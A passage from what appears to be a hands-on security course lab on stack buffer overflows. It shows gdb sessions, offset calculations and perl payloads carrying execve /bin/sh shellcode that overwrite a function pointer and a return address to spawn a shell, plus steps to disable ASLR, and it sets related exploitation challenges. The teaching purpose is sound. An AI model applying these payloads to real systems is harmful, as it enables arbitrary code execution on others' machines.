0x1 0028| 0xffffd2ac ('A' <repeats 50 times>) [------------------------------------------------------------------------------] Legend: code, data, rodata, value Breakpoint 3, 0x0804851d in main ( argc=<error reading variable: Cannot access memory at address 0x41414141>, argc@entry=<error reading variable: Cannot access memory at address 0x4141413d>, argv=<error reading variable: Cannot access memory at address 0x41414145>, argv@entry=<error reading variable: Cannot access memory at address 0x4141413d>) at vuln.c:22 22 strcpy(buffer, argv[1]); gdb-peda$ x/32b buffer 0xffffd2ac: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xffffd2b4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xffffd2bc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xffffd2c4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 gdb-peda$ continue Continuing. Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] EAX: 0x41414141 ('AAAA') EBX: 0xf7f9d000 --> 0x1a5da8 ECX: 0xffffd580 --> 0x58004141 ('AA') EDX: 0xffffd2dc --> 0xf7004141 ESI: 0x0 EDI: 0x0 EBP: 0xffffd2d8 ("AAAAAA") ESP: 0xffffd29c --> 0x8048525 (<main+98>: mov eax,0x0) EIP: 0x41414141 ('AAAA') EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] Invalid $PC address: 0x41414141 [------------------------------------stack-------------------------------------] 0000| 0xffffd29c --> 0x8048525 (<main+98>: mov eax,0x0) 0004| 0xffffd2a0 --> 0x0 0008| 0xffffd2a4 --> 0xca0000 0012| 0xffffd2a8 --> 0x1 0016| 0xffffd2ac ('A' <repeats 50 times>) 0020| 0xffffd2b0 ('A' <repeats 46 times>) 0024| 0xffffd2b4 ('A' <repeats 42 times>) 0028| 0xffffd2b8 ('A' <repeats 38 times>) [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x41414141 in ?? () gdb-peda$
In the above GDB output we've used breakpoints to break right before and after the calling of the strcpy()
function. We see that 50 bytes from the buffer address (using x/50b buffer
) are random before strcpy()
and filled with A
(0x41
) afterward. From the GDB output we now know we overflow the buffer and also the func_ptr
function pointer. We know we overwrite quite a bunch of stuff since we also overwrite the main() function arguments:
argc=<error reading variable: Cannot access memory at address 0x41414141>, argc@entry=<error reading variable: Cannot access memory at address 0x4141413d>, argv=<error reading variable: Cannot access memory at address 0x41414145>, argv@entry=<error reading variable: Cannot access memory at address 0x4141413d>) at vuln.c:22
Of course, our aim is to do a carefully crafted to write func_ptr
with exactly the value we want, that is the address of the shellcode
global variable. In order to do that we need to precisely know where func_ptr
is located with respect to buffer
. Let's assume that difference is d
(d = &func_ptr - &buffer
). Our goal would be to write in the buffer d
bytes followed by the address of the shellcode
variable. So we will provide a string of d+4
length as the program argument.
Our steps for this to happen are:
func_ptr
and buffer
. Let's call it d
.shellcode
.d+4
bytes consisting of d
bytes of A
(just a padding) and then the 4 bytes for the address of shellcode
.
In order to compute the difference between func_ptr
and buffer
we need to use dynamic analysis (GDB) as the two variables are stored on the stack:
$ gdb -q ./vuln Reading symbols from ./vuln...done. gdb-peda$ start [...] gdb-peda$ p &func_ptr $1 = (void (**)(void)) 0xffffd2fc gdb-peda$ p &buffer $2 = (char (*)[32]) 0xffffd2dc
In the run above, the two variables are 0xffffd2fc
' and 0xffffd2dc
. It may be different on another run. The difference is 0x20
meaning 32
:
$ python -c 'print 0xffffd2fc-0xffffd2dc' 32
func_ptr
and buffer
) will differ. However the difference between the two addresses stays the same.
This was expected since the buffer stores 32 characters. However, this needn't always be the case and you need to make sure of that by (dynamic) analysis, such as the one we did with GDB.
So, d
(the difference) is 32
.
To find out the address of the shellcode
variable we use static analysis, since the variable is global and stored in the .rodata
section of the executable. We use nm
for that:
$ nm vuln | grep shellcode 080485d0 r shellcode
So the address of shellcode
that we aim to use to overwrite the func_ptr
function pointer is 0x080485d0
.
shellcode
variable may differ from 0x080485d0
if the executable was obtained on another system with another compiler.
We now construct the d+4
(32+4=36
) byte string to feed as the first program argument. We use perl
for that:
$ perl -e 'print "A"x32,"\xd0\x85\x04\x08"' AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAЅ .... $ perl -e 'print "A"x32,"\xd0\x85\x04\x08"' | od -t x4 0000000 41414141 41414141 41414141 41414141 * 0000040 080485d0
We see that we are generating the proper byte string, filling the buffer with A
characters and then using the 4 byte address of shellcode
(\xd0\x85\x04\x08
) to overwrite the func_ptr
.
Let's pass that string as the first argument using shell command substitution and profit:
$ ./vuln $(perl -e 'print "A"x32,"\xd0\x85\x04\x08"') $
Excellent, we've got a shell! We've now got closer to what an attack really looks like, the trigger step happening with the help of a buffer overflow cause by the strcpy()
function.
Let's now get to the next step towards making the attack more realistic. We would rarely have the benefit of a function pointer (such as func_ptr
) being conveniently placed after a buffer in memory. What we usually aim to do is overwrite the function return address, point that to the shellcode (in our case the shellcode
variable) and profit!
Inside the 06-challenge-overwrite-return-address/
subfolder in the tasks archive you will find a vulnerable source code file (vuln.c
). This file has a buffer overflow vulnerability through the call of strcpy()
inside the do_nothing_successfully()
function.
Exploit this vulnerability by causing a buffer overflow of the buffer
variable and overwriting the return address of the do_nothing_successfully()
function to point to the shellcode (i.e. the address of the shellcode
variable).
shellcode
variable.
$ebp+4
construct in GDB to find out the address where the function return address is stored.
Passing information as a program argument is one of the way to provide input to the vulnerable program. Another way is through standard input. Let's use standard input to cause a buffer overflow and run the shellcode (again inside the shellcode
variable).
Inside the 07-challenge-use-standard-input/
subfolder in the tasks archive you will find a vulnerable source code file (vuln.c
) with a similar vulnerability to the one above: the use of strcpy()
to cause a buffer overflow inside the do_nothing_successfully()
function. There are several differences:
fgets()
Similarly to the task above, exploit the vulnerability by causing a buffer overflow of the buffer
variable and overwriting the return address of the do_nothing_successfully()
function to point to the shellcode (i.e. the address of the shellcode
variable).
do_nothing_successfully()
. GDB is probably the best way to do that.
Find out the address of the shellcode
variable in the vuln
executable. nm
should be the simplest way to do that.
Create a payload to feed to the program consisting of d
(the difference) bytes of A
and then the address of the shellcode
variable. Bear in mind we are using a little endian architecture.
perl -e 'print "A"x50...' | ./vuln
However, this doesn't work. Even if the shellcode executes and a shell would be create the pipe is closed and so the standard input for the shell is closed. You can still check if it works with strace
.
The proper way to do this is with a command such as
cat <(perl -e 'print "A"x50...') - | ./vuln
The above command “concatenates” the output of the perl
command with stadard input (-
). After the output of the perl
command is fed to the vuln
program and a shell is created, the perl
process closes, but the vuln
program would continue getting information from standard input.
If everything, you will not get an expected prompt ($
) but any command you provide to standard input will be run by the shell.
Now that we know how to cause a buffer overflow and trigger the execution of the shellcode, let's make another step into making things more realistic by injecting the shellcode into the program. Up until now the shellcode was conveniently stored in the shellcode
variable, which is fairly unrealistic.
Inside the 07-challenge-fill-global-variable/
subfolder in the tasks archive we have the vuln.c
program that we want to exploit. Our aim is to inject and store the shellcode in the resident_data
global variable. The shellcode will be stored in the resident_data
global variable, while the attack payload (consisting of the A
byte padding and the address of the resident_data
variable) will be stored in the input_buffer
variable and the in the buffer
variable; both are provided through standard input.
Similarly to the task above, exploit the vulnerability by injecting the shellcode
through stadard input in the resident_data
global variable, causing a buffer overflow of the buffer
variable and overwriting the return address of the do_nothing_successfully()
function to point to the shellcode (i.e. the address of the resident_data
global variable).
shellcode
variable in the above tasks. You may use echo
, python
or perl
to print it. It may be of help to store the shellcode in a file and feed input from that file.
resident_data
global variable, end it with a newline (\n
). fgets()
needs a newline to complete.
In the above task we were in luck that we had two buffers and both were filled by feeding input to the vulnerable program (in our case, through standard input). But that's not usually the case. Let's consider the situation where the resident_data
buffer is not part of our program. Could an attack be possible? Yes, of course: we can use the input_buffer
variable both for storing the shellcode and the payload for causing the buffer overflow. This data will then be copied to the buffer
variable and we'll profit!
In the 08-tutorial-shellcode-in-stack-buffer/
subfolder in the tasks archive the vuln.c
program has the strcpy()
-based vulnerability identical to the above tasks but no “helper” buffer. We'll have to use the buffer
variable both for storing the shellcode and the payload for causing the buffer overflow.
In short, we'll have to get to a situation where we overwrite the return address of do_nothing_successfully()
function with the start address of the buffer
variable, such that we'll execute code from the buffer
variable. The contents of the buffer
variable will start with the shellcode we've used so far. We'll feed that as input to the buffer.
The steps we are going to undertake are:
d
, the difference between the start of the buffer and the return address to know how to to trigger the buffer overflow. It should be identical to the one in the tasks above, but it's always good to be sure. We'll use GDB for this.buffer
variable on the stack. We'll use GDB for this as well.n
bytes of shellcode (where n
is the length of the shellcode)d-n
bytes of A
padding (where d
is the above difference)4
bytes storing the address of the buffer variable (on the stack)payload
) as it will be easier to inspect it afterwards. cat payload - | ./vuln
First of all, let's find out the difference between the buffer
' variable and address of the return address in the the do_nothing_successfully()
function stack frame. We'll use GDB for that, get to the point before invoking strcpy()
call (in the do_nothing_successfully()
function) by using a breakpoint and then print the address of the buffer
variable and the address where the return address is stored.
$ gdb -q ./vuln Reading symbols from ./vuln...done. gdb-peda$ start [...] gdb-peda$ disass do_nothing_successfully Dump of assembler code for function do_nothing_successfully: 0x0804847b <+0>: push ebp 0x0804847c <+1>: mov ebp,esp 0x0804847e <+3>: sub esp,0x58 0x08048481 <+6>: mov DWORD PTR [ebp-0xc],0x3 0x08048488 <+13>: sub esp,0x8 0x0804848b <+16>: push DWORD PTR [ebp+0x8] 0x0804848e <+19>: lea eax,[ebp-0x52] 0x08048491 <+22>: push eax 0x08048492 <+23>: call 0x8048350 <strcpy@plt> 0x08048497 <+28>: add esp,0x10 [...] gdb-peda$ b *0x08048492 Breakpoint 2 at 0x8048492: file vuln.c, line 10. gdb-peda$ continue Continuing. Provide input data: aaaa [...] Breakpoint 2, 0x08048492 in do_nothing_successfully (str=0xffffd280 "aaaa\n") at vuln.c:10 10 strcpy(buffer, str); gdb-peda$ p &buffer $1 = (char (*)[70]) 0xffffd216 gdb-peda$ p $ebp+4 $2 = (void *) 0xffffd26c gdb-peda$
In GDB we've printed the address of the local buffer variable and the address where the return address is stored ($ebp+4
). These addresses may be different on your system. We'll compute the difference using Python:
$ python -c 'print 0xffffd26c-0xffffd216' 86
As before, the difference is 86
bytes. We need to create a payload of 86+4
bytes to overwrite the return address in the do_nothing_successfully()
stack frame.
We already found out the address of the buffer variable as well: 0xffffd216
. So we're ready to create our payload. As stated above the payload will consist of:
n
bytes of shellcode (where n
is the length of the shellcode)d-n
bytes of A
padding (where d
is the above difference)4
bytes storing the address of the buffer
variable (on the stack)Our shellcode is the one we've already used. Let's find out its length:
$ echo -en '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80' | wc -c 25
So our payload will consist of 90
bytes:
25
bytes of shellcode86-25 = 61
bytes of A
padding4
bytes storing the address of the buffer
variable (\x16\xd2\xff\xff
)
Let's create the payload and store it in a file named payload
:
$ perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80","A"x61,"\x16\xd2\xff\xff\n"' > payload $ wc -c payload 91 payload $ xxd payload 00000000: 31c0 5068 2f2f 7368 682f 6269 6e89 e350 1.Ph//shh/bin..P 00000010: 5389 e131 d2b0 0bcd 8041 4141 4141 4141 S..1.....AAAAAAA 00000020: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000030: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000040: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000050: 4141 4141 4141 16d2 ffff 0a AAAAAA.....
So the payload
file now stores our payload and we can feed it to the vulnerable program.
We send the payload to the standard input of the vuln
program:
$ cat payload - | ./vuln ps Segmentation fault
We get a segmentation fault, something went wrong. Let's check what caused the error, maybe we didn't properly construct they payload and jumped to a different address:
$ dmesg [...] [144777.383326] vuln[15245]: segfault at ffffd216 ip 00000000ffffd216 sp 00000000ffb71620 error 14
Nope. The address where segmentation fault occurred is OK; it's the buffer address 0xffffd216
.
Let's investigate in GDB what happens by feeding the same data to the standard input of the vuln
program:
$ gdb -q ./vuln Reading symbols from ./vuln...done. gdb-peda$ run < payload Starting program: [...]/shellcode-in-stack-buffer/vuln < payload process 26482 is executing new program: /bin/dash [...]
This is weird. The exploit works under GDB. There must be something different between the two environments: running in GDB and without GDB.
There are actually two aspects:
First of all we need to disable ASLR. We have two ways to do that:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
$ linux32 -3 -R bash -l
If ASLR is enabled dynamic memory areas will be placed in different locations. We can use ldd
to inspect the placing of library memory areas
$ ldd vuln linux-gate.so.1 (0xf77a1000) libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xf75bd000) /lib/ld-linux.so.2 (0xf77a4000) $ ldd vuln linux-gate.so.1 (0xf76e4000) libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xf7500000) /lib/ld-linux.so.2 (0xf76e7000) $ ldd vuln linux-gate.so.1 (0xf77c9000) libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xf75e5000) /lib/ld-linux.so.2 (0xf77cc000)
In the above situation ASLR is enabled as the addresses for library functions differs at each ldd
run.
After we disable ASLR (using any of the above two methods), we can see that the addresses for library functions are identical for each ldd
run:
$ ldd vuln linux-gate.so.1 (0xb7ffd000) libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xb7e19000) /lib/ld-linux.so.2 (0x41000000) $ ldd vuln linux-gate.so.1 (0xb7ffd000) libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xb7e19000) /lib/ld-linux.so.2 (0x41000000) $ ldd vuln linux-gate.so.1 (0xb7ffd000) libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xb7e19000) /lib/ld-linux.so.2 (0x41000000)
$ gdb -q ./vuln Reading symbols from ./vuln...done. gdb-peda$ aslr ASLR is OFF gdb-peda$ show disable-randomization Disabling randomization of debuggee's virtual address space is on. gdb-peda$ set disable-randomization off gdb-peda$ show disable-randomization Disabling randomization of debuggee's virtual address space is off. gdb-peda$ aslr ASLR is ON
Let's now also use the same environment for GDB and for the program. In order to do that we need to clear the environment using the env
command with the -i
option that clears the environment. Let's run the program in GDB with the cleared environment:
$ env -i gdb -q ./vuln Reading symbols from ./vuln...done. (gdb) show env LINES=23 COLUMNS=80 (gdb) unset env LINES (gdb) unset env COLUMNS (gdb) show env (gdb) disass do_nothing_successfully Dump of assembler code for function do_nothing_successfully: 0x0804847b <+0>: push %ebp 0x0804847c <+1>: mov %esp,%ebp 0x0804847e <+3>: sub $0x58,%esp 0x08048481 <+6>: movl $0x3,-0xc(%ebp) 0x08048488 <+13>: sub $0x8,%esp 0x0804848b <+16>: pushl 0x8(%ebp) 0x0804848e <+19>: lea -0x52(%ebp),%eax 0x08048491 <+22>: push %eax 0x08048492 <+23>: call 0x8048350 <strcpy@plt> 0x08048497 <+28>: add $0x10,%esp 0x0804849a <+31>: movzbl -0x52(%ebp),%eax 0x0804849e <+35>: mov %eax,%edx 0x080484a0 <+37>: sar $0x7,%dl 0x080484a3 <+40>: shr $0x5,%dl 0x080484a6 <+43>: add %edx,%eax 0x080484a8 <+45>: and $0x7,%eax 0x080484ab <+48>: sub %edx,%eax 0x080484ad <+50>: movsbl %al,%eax 0x080484b0 <+53>: cmp -0xc(%ebp),%eax 0x080484b3 <+56>: jne 0x80484b9 <do_nothing_successfully+62> 0x080484b5 <+58>: movb $0x61,-0x52(%ebp) ---Type <return> to continue, or q <return> to quit--- 0x080484b9 <+62>: leave 0x080484ba <+63>: ret End of assembler dump. (gdb) b *0x08048492 Breakpoint 1 at 0x8048492: file vuln.c, line 10. (gdb) run Starting program: /home/razvan/projects/ctf/sss/summerschool2014.git/sessions/sess-09/skel/shellcode-in-stack-buffer/vuln Provide input data: aaaa Breakpoint 1, 0x08048492 in do_nothing_successfully (str=0xbffffcc0 "aaaa\n") at vuln.c:10 10 strcpy(buffer, str); (gdb) p &buffer $1 = (char (*)[70]) 0xbffffc56
So we now have a different address for the buffer
variable: 0xbfffc56
.
Let's try using that address for the payload:
$ perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80","A"x61,"\x56\xfc\xff\xbf\n"' > payload $ cat payload - | env -i ./vuln ps Segmentation fault $ dmesg [150008.596439] vuln[2964]: segfault at 1 ip 00000000bffffc56 sp 00000000bffffdd0 error 6
Unfortunately it still doesn't work so we will try a different approach.
The approach I used make use of the dmesg message that shows us the stack pointer (0xbffffdd0
). That is the stack pointer after the return address is read. So if we know the difference between the function return address and the buffer (86
) we can make use of that to discover the buffer address. When an error occurs the stack pointer, the ret
instruction had just been executed and the return address has been popped off the stack. So the stack pointer now points to the address right after the return address (4 bytes more than the difference between the function address and the buffer). So we have a 86+4=90
bytes difference between the value of the stack pointer in case of an error and the address of the buffer. We compute the address of the buffer according to that
$ python -c 'print hex(0xbffffdd0-90)' 0xbffffd76
We found out the buffer address: 0xbffffd76
. Let's reconstruct the payload and test our vulnerable executable:
$ perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80","A"x61,"\x76\xfd\xff\xbf\n"' > payload $ cat payload - | env -i ./vuln ps PID TTY TIME CMD 2682 pts/1 00:00:01 bash 14783 pts/1 00:00:00 cat 14784 pts/1 00:00:00 sh 14796 pts/1 00:00:00 ps 19602 pts/1 00:00:08 bash
Yes, we've finally done it! We've found out the address of the buffer
variable on the stack and used it to execute the shellcode.
esp
address. It's generally a very good idea to run the vulnerable program under env -i
.
Let's to a similar task as the one above. In the 08-challenge-shellcode-in-stack-buffer-2/
subfolder from the tasks archive there is a slightly updated vulnerable file. Use the same vulnerability as in the task above to obtain a shell.
$ linux32 -3 -R bash -l
Another way of working with strings is to declare them as data inside the shellcode. However, if you do this, you won't know their address at compile-time. You have to obtain the address at runtime by abusing the call instruction, like this:
jmp str back: pop ecx ; call pushes the return address on the stack, which in our case is precisely the string address ... str: call back db 'Hello, world'
Write the shellcode that prints “Hello, world!” using this method.
Switch to the 10-challenge-known-buffer directory. You'll have to exploit the vulnerable binary found there and get a shell.
First, write a shellcode that runs execve(“/bin/sh”, [“sh”, NULL], NULL). Use the template found in the shellcode_template directory. Run make to compile the shellcode and make test to compile the test executable.
The complete exploit will go into the exploit.py file.
You'll first run the program under gdb and use it to inspect the addresses. You'll find the buffer address, then you'll use this address in the exploit.
For this to work, we have to assume that when you run the program the buffer address will be the same as the one you found with gdb. In general this is not true, but we can make it so by doing the following: